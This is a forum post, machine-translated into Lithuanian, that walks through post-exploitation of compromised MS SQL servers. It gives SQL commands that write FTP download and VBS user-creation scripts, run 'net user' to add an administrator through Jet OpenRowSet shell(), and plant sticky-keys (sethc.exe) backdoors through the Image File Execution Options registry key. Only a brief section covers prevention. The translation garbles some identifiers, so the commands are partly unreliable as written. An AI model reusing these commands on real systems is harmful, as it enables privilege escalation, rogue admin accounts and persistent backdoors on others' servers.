exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp sąskaita'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp slaptažodis'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (be grynojo eskalavimo scenarijaus) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
Sėkmingai įvykdžius užklausų analizatorių, C diske pasirodys 1.bat (jei vykdymas sėkmingas, bet C disko nėra, galite pakeisti aplanką į rašymą, nes kurio serverio C disko šakninis katalogas draudžia rašyti)
Tada cmd vykdo ftp -s:c:\1.bat
Kai tai bus įvykdyta, atsisiųsite ne tinklo eskalavimo scenarijų į CFT diską FTP arba parašysite VBS eskalavimo scenarijų tiesiogiai
deklaruoti @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "slaptažodis","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Tada cmd vykdo cscrip, kad pašalintų t c:\1.vbs
4. Ankstesnis pataisytas, kad būtų vykdomos cmd komandos, tačiau po tam tikrų remonto darbų atsiras naujų problemų
(1) Pranešimas: vykdant xp_cmdshell įvyko klaida. Iškvietimas "CreateProcess" nepavyko su klaidos kodu: "5".
5 klaida yra sistemos paragintas klaidos numeris, "CreateProcess" yra gijos kūrimo reikšmė, šis klaidų generavimas turi daug bendro su sistemos failų cmd.exe, vienas yra tai, kad cmd ištrinamas, kitas - sumažintas cmd leidimas.
SQL terminalo prievadams ir atidarymo būsenai patikrinti:
exec meistras .. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Gerai, pagrindinis dalykas žemiau yra naudoti dvi SQL instrukcijas, kad nukopijuotumėte sistemos naršyklės failą į sistemos "Shift" užpakalinių durų failą, o šie du teiginiai vykdomi atskirai.
Šis pareiškimas nukopijuoja explorer.exe kaip sethc.exe
paskelbti @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
Šis sakinys nukopijuoja sethc.exe į dllcache katalogą
Declare @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe";
Kiti du teiginiai naudoja sp_oacreate saugomas procedūras, kurioms reikia naudoti odsole70.dll failą, todėl šio failo išlikimas yra susijęs su jo sukūrimo sėkme.
(2), xpsql.cpp: 5 klaida iš "CreateProcess" (737 eilutė)
Ši situacija yra sudėtingesnė ir sakoma internete
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Pasirinkite * iš OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Pasirinkite * iš OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Aš patikrinau smėlio dėžę, kad padidinčiau teises šiuo klausimu, bet per mano praktiką, šis sėkmės rodiklis yra labai mažas, nes dauguma serverių ištrynė c: \ windows \ system32 \ ias \ ias.mdb. Tada galite pabandyti vaizdo užgrobimo sethc, žinoma, vaizdo užgrobimas taip pat yra sąlyginis, 1 egzistuoti xp_regwrite ši saugoma procedūra 2 yra "HKEY_LOCAL_MACHINE", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Derintuvas" nepanaikintas
Pirmiausia galite pasiteirauti, ar registro lipnus raktas buvo užgrobtas
exec meistras .. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
Jei raginimas neranda problemos, įrodymas ištrinamas, nėra jokio būdo, jei paraginama, sethc.exe vykdyti sql komandą
EXEC meistras.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE",
@value_name='Derintuvas',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
5 kartus prisijungus prie terminalo ir perkėlus, jis eina tiesiai į darbalaukį, o tada prideda rankiniu būdu.
Registras modifikuoja terminalo prievadą
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE SYSTEM "CurrentControlSet" "Control" terminalo serveris "WinStations" RDP-TCP,
Kalbant apie vaizdo užgrobimo prevenciją, tai daugiausia pasiekiama šiais metodais:
★ Leidimų apribojimo įstatymas
Jei vartotojas nebeturi prieigos prie registro rakto, jis negali keisti šių dalykų. Atidarykite registro rengyklę ir eikite į HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, pasirinkite šį elementą, dešiniuoju pelės mygtuku spustelėkite - > leidimus - > išplėstinę ir sumažinkite administratoriaus ir sistemos vartotojų teises (čia tereikia atšaukti rašymo operaciją).
★ Greitas peilio pjovimas netvarkingas kanapių metodas
Atidarykite registro rengyklę ir eikite į juostą
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Vaizdo failo vykdymo parinktys
Problemą galima išspręsti tiesiogiai ištrinant elementą Vaizdo failo vykdymo parinktys.
SQL komanda užgrobia registro lipnaus rakto diegimo užpakalines duris
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Derintuvas','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Programinės įrangos atsisiuntimas:Turistai, jei norite pamatyti paslėptą šio įrašo turinį, prašome Atsakyti
|
Paskelbta 2015-03-18 10:36:56
|
|
|
|
Paskelbta 2015-03-19 20:26:09
|
